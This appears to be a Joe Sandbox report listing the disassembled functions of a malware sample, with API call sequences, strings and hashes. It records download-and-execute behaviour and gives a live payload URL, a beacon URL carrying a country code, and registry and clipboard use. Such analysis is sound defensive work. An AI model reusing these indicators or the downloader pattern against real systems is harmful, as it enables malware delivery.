GlobalFree.KERNEL32(00000000), ref: 00401919
CloseClipboard.USER32 ref: 0040193D
Sleep.KERNEL32(000002D2), ref: 00401948

Strings

i, xrefs: 00401759

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: i
API String ID: 1583243082-3865851505
Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
CloseHandle.KERNEL32(00000000), ref: 00402B07
ShellExecuteExW.SHELL32(?), ref: 00402B68
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
CloseHandle.KERNEL32(?), ref: 00402B89
InternetCloseHandle.WININET(00000000), ref: 00402B92
InternetCloseHandle.WININET(00000000), ref: 00402B95

Strings

ShareScreen, xrefs: 00402A12
<, xrefs: 00402B45
.exe, xrefs: 00402A6B

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen
API String ID: 3323492106-493228180
Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4

Function 009BB366 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009BB38E
Module32First.KERNEL32(00000000,00000224), ref: 009BB3AE

Memory Dump Source

Source File: 00000000.00000002.4215370096.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, Offset: 009BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ba000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 9e840caec8a7504e119a2d6f07ae012fd3e736b3d9d35c7d6130964cedf3a1cd
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 62F062315017156BD7203AF59D8DBAE76ECEF49735F100628E642910C0DBB1EC458A61

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

GetLastError.KERNEL32 ref: 0043D150
__dosmaperr.LIBCMT ref: 0043D157
GetFileType.KERNEL32(00000000), ref: 0043D163
GetLastError.KERNEL32 ref: 0043D16D
__dosmaperr.LIBCMT ref: 0043D176
CloseHandle.KERNEL32(00000000), ref: 0043D196
CloseHandle.KERNEL32(?), ref: 0043D2E0
GetLastError.KERNEL32 ref: 0043D312
__dosmaperr.LIBCMT ref: 0043D319

Strings

H, xrefs: 0043D29E

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

Function 0248003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0248024D

Strings

cess, xrefs: 0248018D
kernel32.dll, xrefs: 0248008F, 02480095

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 7b1ad8852e436fc1817e3e2aa783fdc326378ef2b8c29df7ba1e42edb9faaceb
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 9B527A74A11229DFDB64CF58C984BADBBB1BF09304F1480DAE50DAB351DB30AA89CF14

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
InternetCloseHandle.WININET(00000000), ref: 00402E4B
InternetCloseHandle.WININET(00000000), ref: 00402E4E

Strings

https://post-to-me.com/track_prt.php?sub=, xrefs: 00402C57, 00402D83, 00402DF2
ShareScreen, xrefs: 00402C22
&cc=DE, xrefs: 00402DB4, 00402DBA, 00402E17

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Internet$CloseHandleOpen_wcslen
String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
API String ID: 3067768807-1501832161
Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 004051E4
__Mtx_init.LIBCPMT ref: 0040520A
std::_Cnd_initX.LIBCPMT ref: 0040522D
__Thrd_start.LIBCPMT ref: 00405252
std::_Cnd_waitX.LIBCPMT ref: 00405272
std::_Cnd_initX.LIBCPMT ref: 0040529F

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 0040581C
__Cnd_signal.LIBCPMT ref: 00405828
std::_Cnd_initX.LIBCPMT ref: 0040583D
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: F(@
API String ID: 1611280651-2698495834
Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
__dosmaperr.LIBCMT ref: 0042E170

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
__dosmaperr.LIBCMT ref: 0043479F

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC

ExitThread.KERNEL32 ref: 0042E086
CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
PostQuitMessage.USER32(00000000), ref: 00402563

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: MessagePostProcQuitWindow
String ID:
API String ID: 3873111417-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001D1B), ref: 00401562

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

Strings

http://176.113.115.19/ScreenUpdateSync.exe, xrefs: 0040156D, 004016A6

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: _wcslen$Sleep
String ID: http://176.113.115.19/ScreenUpdateSync.exe
API String ID: 3358372957-3120454669
Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E

Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040298F
__fassign.LIBCMT ref: 0040299F

Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID:
API String ID: 2843524283-0
Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8

Function 02480E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,02480223,?,?), ref: 02480E19
SetErrorMode.KERNEL32(00000000,?,?,02480223,?,?), ref: 02480E1E

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 625e0f7f1e1b302f448508261efaf1e752b234688f5247d6a6466c6c1b929a9e
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 85D0123215512877D7003A94DC09BDE7B1CDF05B66F008011FB0DD9180C770954046E5

Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754

Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0040377C

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A

Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54

Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00403CC9

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94

Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004327C3

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9

Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D00C

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4

Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD

Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004103C7

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D

